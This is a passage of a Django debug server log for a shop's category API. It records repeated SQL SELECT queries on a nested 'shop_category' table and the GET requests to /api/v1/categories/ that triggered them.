HTTP/1.0" 302 0 DEBUG 2019-12-16 06:51:49,682 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 06:51:49,689 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 06:51:49,692 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-16 06:51:49,695 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 06:51:49,697 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 06:51:49,700 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 06:51:49,704 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [16/Dec/2019 06:51:49] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-16 06:51:49,706 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 06:51:49,709 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 06:51:49,711 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 06:51:49,713 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 06:51:49,717 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 06:51:49,719 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 06:51:49,721 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 06:51:49,723 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 06:51:49,725 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 06:51:49,728 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 06:51:49,731 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 06:51:49,733 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 06:51:49,735 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 06:51:49,737 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 06:51:49,741 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 06:51:49,743 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 06:51:49,745 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 06:51:49,748 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 06:51:49,750 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 06:51:49,752 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 06:51:49,755 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 06:51:49,757 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 06:51:49,760 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 06:51:49,762 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 06:51:49,764 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 06:51:49,767 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 06:51:49,770 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 06:51:49,772 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 06:51:49,774 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 06:51:49,776 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 06:51:49,780 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 06:51:49,782 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 06:51:49,784 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 06:51:49,787 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 06:51:49,789 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 06:51:49,791 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 06:51:49,794 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 06:51:49,796 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 06:51:49,798 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 06:51:49,801 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 06:51:49,804 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 06:51:49] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 06:56:39] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 06:59:36,701 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 06:59:36,709 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 06:59:36,712 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-16 06:59:36,715 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 06:59:36,718 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 06:59:36,720 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 06:59:36,724 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [16/Dec/2019 06:59:36] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-16 06:59:36,727 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 06:59:36,729 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 06:59:36,731 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 06:59:36,734 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 06:59:36,737 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 06:59:36,739 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 06:59:36,742 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 06:59:36,744 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 06:59:36,746 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 06:59:36,750 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 06:59:36,752 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 06:59:36,754 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 06:59:36,757 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", 